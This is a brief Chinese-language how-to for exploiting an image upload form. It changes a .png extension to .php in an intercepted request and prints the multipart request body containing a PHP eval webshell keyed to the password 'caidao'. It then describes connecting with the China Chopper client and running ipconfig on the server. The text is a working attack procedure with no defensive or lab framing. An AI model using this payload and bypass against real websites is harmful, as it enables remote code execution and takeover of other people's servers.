思路:
圖片上傳功能中,前端頁面上傳的是.png格式的圖片文件,但是抓包Request中修改圖片后綴為.php
可以繞過對上傳文件格式的限制,文件的上傳路徑可以在上傳后的頁面或查看上傳成功后的response中有顯示,
記錄下來后用菜刀連接即可。
(1)網站要求上傳png格式的文件
(2)保存-抓包,將文件后綴.png刪除,剩余.php文件繼續提交,提示成功。
Content-Disposition: form-data; name="fun_menu_icon" test123trojan.php -----------------------------1962884403821 Content-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123trojan.php" Content-Type: image/png <?php @eval($_POST['caidao']); ?> -----------------------------1962884403821 Content-Disposition: form-data; name="fun_menu_img" test123trojan.php -----------------------------1962884403821 Content-Disposition: form-data; name="fun_menu_img_upload"; filename="test123trojan.php" Content-Type: image/png <?php @eval($_POST['caidao']); ?>
(3)在原始數據提交頁面或提交數據后response頁面中查找上傳路徑並記錄。
(4)打開最新版中國菜刀,添加已經記錄的路徑,添加密碼caidao
(5)連接虛擬終端,輸入ipconfig
木馬成功上傳並執行。